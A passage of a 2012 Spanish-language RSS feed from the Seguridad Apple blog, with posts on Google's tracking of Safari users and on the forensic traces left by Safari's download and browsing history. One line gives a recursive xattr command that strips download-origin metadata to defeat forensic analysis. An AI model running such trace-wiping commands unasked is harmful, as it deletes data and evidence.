&lt;i&gt;&lt;b&gt;Microsoft&lt;/b&gt;&lt;/i&gt; confirmó que este seguimiento no se utilizaba sólo con usuarios de Apple Safari, sino que &lt;a href="http://www.techradar.com/news/internet/microsoft-says-google-bypassing-ie-security-too-1064918"&gt;aquellos que navegaban con Internet Explorer también eran espiados&lt;/a&gt; por parte de las anuncios mostrados en las páginas visitadas. &lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;En segundo lugar, hay que hablar de las consecuencias legales que esto va a traer para &lt;i&gt;&lt;b&gt;Google&lt;/b&gt;&lt;/i&gt;, ya que parece que este caso va convertirse en algo similar a lo que ya sucedió cuando se supo que &lt;a href="http://www.elladodelmal.com/2010/06/el-mundo-contra-google.html"&gt;el Google Street Car estaba grabando información de las redes WiFi que iba encontrando&lt;/a&gt;. De momento, tal y como informan &lt;a href="http://www.appleinsider.com/articles/12/02/21/safari_user_sues_google_over_claimed_privacy_violation.html"&gt;desde Apple Insider&lt;/a&gt;, &lt;i&gt;&lt;b&gt;Google ha sido demandada&lt;/b&gt;&lt;/i&gt; por varios usuarios y organizaciones por saltarse las opciones de privacidad establecidas en el navegador, que ya se verá en qué terminan.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-D3WzvCdpX3g/T0SDs4tqgMI/AAAAAAAADEw/P5O_q6yjajU/s1600/donottrackplus_.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-D3WzvCdpX3g/T0SDs4tqgMI/AAAAAAAADEw/P5O_q6yjajU/s1600/donottrackplus_.jpg" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 1: Do Not Track Plus en Apple Safari&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Por último, ya han salido algunas herramientas para extremar las opciones de privacidad en los navegadores para evitar este seguimiento. Hay que recordar que soluciones como &lt;i&gt;&lt;b&gt;NoScript&lt;/b&gt;&lt;/i&gt; o similares -  o plugins para quitar la publicidad de la &lt;i&gt;&lt;b&gt;Google&lt;/b&gt;&lt;/i&gt; mientras se navega - existen hace mucho tiempo. Para los usuarios de &lt;i&gt;&lt;b&gt;Apple Safari&lt;/b&gt;&lt;/i&gt;, &lt;a href="http://www.macworld.com/article/165494/2012/02/browser_add_on_stops_google_and_others_from_tracking_you_online.html"&gt;desde MacWorld&lt;/a&gt; han recomendado el uso de &lt;a href="http://www.abine.com/dntdetail.php"&gt;Do Not Tack Plus&lt;/a&gt;, un plugin que extrema las opciones de privacidad e informa cuando se están enviando datos a páginas externas. En el siguiente vídeo tenéis una demostración de cómo funciona.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;center&gt;&lt;br /&gt;
&lt;iframe allowfullscreen="" frameborder="0" height="335" src="http://www.youtube.com/embed/D-cwcWiB8mU" width="540"&gt;&lt;/iframe&gt;&lt;/center&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;En cualquier caso, desde &lt;a href="http://www.seguridadapple.com/"&gt;Seguridad Apple&lt;/a&gt; os queremos recordar la importancia de extremar las medidas de privacidad y aplicar hábitos "saludables", porque todo esto que estamos viendo con escándalos de privacidad puede ser nada más que la punta del iceberg.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;br/&gt;Descubre en este libro cómo funciona el mundo del &lt;a href="http://www.informatica64.com/libros.aspx?id=fonline"&gt;Fraude Online&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;
Publicado en &lt;a href="http://www.seguridadapple.com" target="new"&gt;Seguridad Apple&lt;/a&gt; - 
Suscríbete al &lt;a href="http://feeds.feedburner.com/Seguridadapple"&gt;canal RSS &lt;/a&gt; - Sigue &lt;a href="https://plus.google.com/111010890582588306653/posts"&gt;Seguridad Apple en Google+&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7727366960388490644-8436217571101157732?l=www.seguridadapple.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=wpH_rGSaOKg:h4xoK9Cj5no:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=wpH_rGSaOKg:h4xoK9Cj5no:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=wpH_rGSaOKg:h4xoK9Cj5no:ecdYMiMMAMM"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=ecdYMiMMAMM" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=wpH_rGSaOKg:h4xoK9Cj5no:I9og5sOYxJI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=I9og5sOYxJI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=wpH_rGSaOKg:h4xoK9Cj5no:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=wpH_rGSaOKg:h4xoK9Cj5no:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=wpH_rGSaOKg:h4xoK9Cj5no:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=wpH_rGSaOKg:h4xoK9Cj5no:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/Seguridadapple/~3/wpH_rGSaOKg/el-caso-del-espionaje-de-google.html</link><author>noreply@blogger.com (SeguridadApple)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-D3WzvCdpX3g/T0SDs4tqgMI/AAAAAAAADEw/P5O_q6yjajU/s72-c/donottrackplus_.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadapple.com/2012/02/el-caso-del-espionaje-de-google.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7727366960388490644.post-5947626322330167312</guid><pubDate>Tue, 21 Feb 2012 05:28:00 +0000</pubDate><atom:updated>2012-02-21T19:41:20.131+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">antiforensics</category><category domain="http://www.blogger.com/atom/ns#">Safari</category><category domain="http://www.blogger.com/atom/ns#">Análisis forense</category><category domain="http://www.blogger.com/atom/ns#">Mac OS X</category><title>Privacidad en Apple Safari: Las Descargas</title><description>&lt;div style="text-align: justify;"&gt;
En el artículo de ayer sobre &lt;a href="http://www.seguridadapple.com/2012/02/privacidad-en-apple-safari-el-historial.html"&gt;el Historial de Navegación en Apple Safari&lt;/a&gt; terminábamos preguntándonos si realmente el método de &lt;i&gt;&lt;b&gt;Navegación Privada&lt;/b&gt;&lt;/i&gt; en &lt;i&gt;&lt;b&gt;Apple Safari&lt;/b&gt;&lt;/i&gt; permite que nadie sepa que se ha navegado por un sitio. Hoy queremos ver un apartado que permite a un analista forense conocer precisamente eso, que se ha navegado por un determinado sitio en una determinada fecha: &lt;i&gt;&lt;b&gt;Las descargas de ficheros&lt;/b&gt;&lt;/i&gt;.&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;El historial de descargas&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Tanto si se está trabajando en modo de &lt;i&gt;&lt;b&gt;Navegación Privada&lt;/b&gt;&lt;/i&gt; como si no, &lt;i&gt;&lt;b&gt;Apple Safari&lt;/b&gt;&lt;/i&gt; guarda un historial de todas las descargas al que se puede acceder mediante el menú &lt;i&gt;&lt;b&gt;Visualización&lt;/b&gt;&lt;/i&gt; y la selección de la opción &lt;i&gt;&lt;b&gt;Mostrar Descargas&lt;/b&gt;&lt;/i&gt;.&lt;/div&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-fYFzWx1kgmM/T0ElfPCH3EI/AAAAAAAADEA/8pv-8Md1SX0/s1600/DescargasSafari_1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-fYFzWx1kgmM/T0ElfPCH3EI/AAAAAAAADEA/8pv-8Md1SX0/s1600/DescargasSafari_1.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 1: Acceso a Mostrar Descargas&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Esta opción mostrará un panel lateral en el que se muestra la información de todas las descargas que se han realizado, y que se encuentran almacenadas en el fichero &lt;i&gt;&lt;b&gt;/Users/usuario/Libary/Safari/Downloads.plist&lt;/b&gt;&lt;/i&gt;.&lt;/div&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-Il5rsuOd3I8/T0Elh1obpWI/AAAAAAAADEI/Lv-6vyHtMMM/s1600/DescargasSafari_2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-Il5rsuOd3I8/T0Elh1obpWI/AAAAAAAADEI/Lv-6vyHtMMM/s640/DescargasSafari_2.png" width="540" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 2: Fichero /User/usuario/Safari/Downloads.plist&amp;nbsp;&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Este fichero se seguirá generando incluso si se está trabajando en modo de &lt;i&gt;&lt;b&gt;Navegación Privada&lt;/b&gt;&lt;/i&gt;, y en él, como se puede ver en la imagen siguiente, está disponible la URL de descarga y la fecha y hora en la que se produce.&lt;/div&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-l2YgWo6kgRA/T0EnTDTw2cI/AAAAAAAADEg/H1uWkBcHFdM/s1600/DescargasSafari_5.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-l2YgWo6kgRA/T0EnTDTw2cI/AAAAAAAADEg/H1uWkBcHFdM/s1600/DescargasSafari_5.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 3: Fecha y URL de descarga&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;b&gt;Borrado de historial de descargas&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Para evitar este registro, una vez que se haya terminado la descarga, se puede hacer uso del botón &lt;i&gt;&lt;b&gt;Borrar &lt;/b&gt;&lt;/i&gt;desde la ventana de descargas, y se conseguirá que el fichero &lt;i&gt;&lt;b&gt;Downloads.plist&lt;/b&gt;&lt;/i&gt; quede vacío.&lt;/div&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-MxD8nRLVUDQ/T0EljEVzPDI/AAAAAAAADEQ/uzg1JvF1Iqw/s1600/DescargasSafari_3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-MxD8nRLVUDQ/T0EljEVzPDI/AAAAAAAADEQ/uzg1JvF1Iqw/s1600/DescargasSafari_3.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 4: Ventana de descargas con botón de Borrar&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
La pregunta es.... ¿es suficiente para evitar que un analista forense sepa que se ha navegado por un sitio en un determinado momento?. &amp;nbsp;Pues la respuesta ya os la dimos hace tiempo.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;El historial de navegación generado a partir de los ficheros descargados&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Como ya os contamos, en Mac OS X, Apple añade &lt;a href="http://www.seguridadapple.com/2011/10/los-ficheros-en-mac-os-x-almacenan-la.html"&gt;un atributo extendido a todos los ficheros que son descargados de Internet en el que se indica qué programa lo descargó y cuál fue la URL de la descarga&lt;/a&gt;. Es por eso que un analista forense podría, mirando los resultados de &lt;i&gt;&lt;b&gt;xattr&lt;/b&gt;&lt;/i&gt; y la fecha de creación del fichero, descubrir parcialmente el historial de navegación.&lt;/div&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-_Z2Etjnsyj4/T0Epq9o9uPI/AAAAAAAADEo/PfpXtR_Y0to/s1600/DescargasSafari_4.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-_Z2Etjnsyj4/T0Epq9o9uPI/AAAAAAAADEo/PfpXtR_Y0to/s1600/DescargasSafari_4.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 5: URL de descarga y fecha de creación del fichero&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Como ya os contamos, es posible borrar estos atributos extendidos con un comando &lt;i&gt;&lt;b&gt;xattr&lt;/b&gt;&lt;/i&gt; sobre todos los ficheros del perfil de usuario:&amp;nbsp;&lt;b style="background-color: white; color: #222222; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;&lt;i&gt;xattr -v -r -d kMDItemWhereFroms *&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Tal vez os estéis preguntado ahora&amp;nbsp;&lt;i&gt;&lt;b&gt;si es posible entonces conocer el historial de navegación de un usuario si este no se descarga ningún archivo&lt;/b&gt;&lt;/i&gt;. Pues lo veremos en un próximo artículo.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;br/&gt;Descubre en este libro cómo funciona el mundo del &lt;a href="http://www.informatica64.com/libros.aspx?id=fonline"&gt;Fraude Online&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;
Publicado en &lt;a href="http://www.seguridadapple.com" target="new"&gt;Seguridad Apple&lt;/a&gt; - 
Suscríbete al &lt;a href="http://feeds.feedburner.com/Seguridadapple"&gt;canal RSS &lt;/a&gt; - Sigue &lt;a href="https://plus.google.com/111010890582588306653/posts"&gt;Seguridad Apple en Google+&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7727366960388490644-5947626322330167312?l=www.seguridadapple.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=mGOBjjdMm5w:YXERHg7mxSI:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=mGOBjjdMm5w:YXERHg7mxSI:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=mGOBjjdMm5w:YXERHg7mxSI:ecdYMiMMAMM"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=ecdYMiMMAMM" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=mGOBjjdMm5w:YXERHg7mxSI:I9og5sOYxJI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=I9og5sOYxJI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=mGOBjjdMm5w:YXERHg7mxSI:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=mGOBjjdMm5w:YXERHg7mxSI:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=mGOBjjdMm5w:YXERHg7mxSI:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=mGOBjjdMm5w:YXERHg7mxSI:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/Seguridadapple/~3/mGOBjjdMm5w/privacidad-en-apple-safari-las.html</link><author>noreply@blogger.com (SeguridadApple)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-fYFzWx1kgmM/T0ElfPCH3EI/AAAAAAAADEA/8pv-8Md1SX0/s72-c/DescargasSafari_1.png" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://www.seguridadapple.com/2012/02/privacidad-en-apple-safari-las.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7727366960388490644.post-7121183855431777402</guid><pubDate>Mon, 20 Feb 2012 06:10:00 +0000</pubDate><atom:updated>2012-02-20T07:10:00.071+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Privacidad</category><category domain="http://www.blogger.com/atom/ns#">Safari</category><category domain="http://www.blogger.com/atom/ns#">Análisis forense</category><category domain="http://www.blogger.com/atom/ns#">Mac OS X</category><title>Privacidad en Apple Safari: El Historial de Navegación</title><description>&lt;div style="text-align: justify;"&gt;El análisis de la navegación por Internet desde un equipo puede desvelar muchas cosas. Es por eso que en casos como el de &lt;a href="http://www.seguridadapple.com/2012/02/google-vigilaba-la-navegacion-de-los.html"&gt;Google en el que se permite analizar la navegación de un usuario a terceros&lt;/a&gt; la gente se preocupa tanto. Es un tema serio de privacidad que debe ser tenido en cuenta. Hoy queremos echarle un ojo a cómo gestionar el historial de navegación de Apple Safari y a qué se puede sacar de él.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;Inspeccionar el historial de Navegación&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;El historial de &lt;i&gt;&lt;b&gt;Apple Safari&lt;/b&gt;&lt;/i&gt; puede ser revisado fácilmente mediante la combinación de teclas &lt;i&gt;&lt;b&gt;Alt+Cmd+ L&lt;/b&gt;&lt;/i&gt;, y permite acceder a una ventana que muestra la lista de sitios que se han visitado, organizados por fecha. Si un usuario se deja la sesión abierta, en cuestión de segundos puede ser inspeccionado.&lt;/div&gt;&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-8lN_mAoClbI/T0EeZrm_AcI/AAAAAAAADDI/7OyhLvRdy-A/s1600/HistorialSafari_1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-8lN_mAoClbI/T0EeZrm_AcI/AAAAAAAADDI/7OyhLvRdy-A/s640/HistorialSafari_1.png" width="540" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 1: Historial de Navegación en Apple Safari&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;El contenido que se visualiza en esa ventana está almacenado en un fichero en el perfil de usuario en formato &lt;i&gt;&lt;b&gt;.plist&lt;/b&gt;&lt;/i&gt; que se llama &lt;i&gt;&lt;b&gt;/Users/usuario/Library/Safari/History.plist&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-C-MEVokDv1g/T0EeatPaciI/AAAAAAAADDQ/kVSuiHJHrk4/s1600/HistorialSafari_2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-C-MEVokDv1g/T0EeatPaciI/AAAAAAAADDQ/kVSuiHJHrk4/s640/HistorialSafari_2.png" width="540" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 2: History.plist con el historial de navegación de Apple Safari&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;b&gt;Borrar una o todas las entradas del Historial de Navegación&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Desde la ventana de &lt;i&gt;&lt;b&gt;Historial de navegación&lt;/b&gt;&lt;/i&gt; es posible &lt;i&gt;&lt;b&gt;eliminar una entrada&lt;/b&gt;&lt;/i&gt; del historial de navegación manualmente. Para ello basta con posicionarse sobre la entrada y en el menú contextual del botón derecho seleccionar la opción de &lt;i&gt;&lt;b&gt;Eliminar&lt;/b&gt;&lt;/i&gt;. Si por el contrario se desea &lt;i&gt;&lt;b&gt;eliminar el historial de navegación completo,&lt;/b&gt;&lt;/i&gt; desde el menú de &lt;i&gt;&lt;b&gt;Historial&lt;/b&gt;&lt;/i&gt; se puede seleccionar la última opción: &lt;i&gt;&lt;b&gt;Borrar Historial&lt;/b&gt;&lt;/i&gt;.&lt;/div&gt;&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-w1F3j7NswJ8/T0EefJv6chI/AAAAAAAADDg/mCzPkeplllw/s1600/HistorialSafari_4.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-w1F3j7NswJ8/T0EefJv6chI/AAAAAAAADDg/mCzPkeplllw/s1600/HistorialSafari_4.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 3: Opción de Borrar historial completo en menú Historial&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Además, es posible hacer un &lt;i&gt;&lt;b&gt;borrado programado del historial&lt;/b&gt;&lt;/i&gt;, por lo que entrando en las &lt;i&gt;&lt;b&gt;Preferencias&lt;/b&gt;&lt;/i&gt; del menú &lt;i&gt;&lt;b&gt;Safari&lt;/b&gt;&lt;/i&gt;, y yendo a la opción &lt;i&gt;&lt;b&gt;General&lt;/b&gt;&lt;/i&gt;, se puede establecer una política de eliminación del &lt;i&gt;&lt;b&gt;Historial de navegación&lt;/b&gt;&lt;/i&gt;. Por defecto la configuración es de un mes, pero puedes configurarlo a solo 24 horas, lo que reduciría mucho los datos que se guardan. Así, un ataque de inspección de historial por medio de &lt;i&gt;&lt;b&gt;CSS&lt;/b&gt;&lt;/i&gt; o &lt;i&gt;&lt;b&gt;JavaScript,&lt;/b&gt;&lt;/i&gt; tendría mucho menos datos que sacar.&lt;/div&gt;&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-rLJ89DxUDdo/T0EehIRrQwI/AAAAAAAADDo/WKLAfcqUqcU/s1600/HistorialSafari_5.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-rLJ89DxUDdo/T0EehIRrQwI/AAAAAAAADDo/WKLAfcqUqcU/s640/HistorialSafari_5.png" width="540" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 4: Configuración de política de borrado del historial&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;b&gt;Evitar que se guarde el historial de sitios visitados: Navegación Privada&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Para evitar que se genere ninguna entrada en el historial de sitios visitados se puede utilizar el modo de &lt;i&gt;&lt;b&gt;Navegación Privada&lt;/b&gt;&lt;/i&gt; que está disponible en el menú &lt;i&gt;&lt;b&gt;Safari&lt;/b&gt;&lt;/i&gt;.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-0-wM2zuFB2Y/T0Eej3x1KZI/AAAAAAAADDw/QWRff6_ZX4Y/s1600/HistorialSafari_6.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-0-wM2zuFB2Y/T0Eej3x1KZI/AAAAAAAADDw/QWRff6_ZX4Y/s1600/HistorialSafari_6.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 5: Activación de modo de Navegación Privada&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
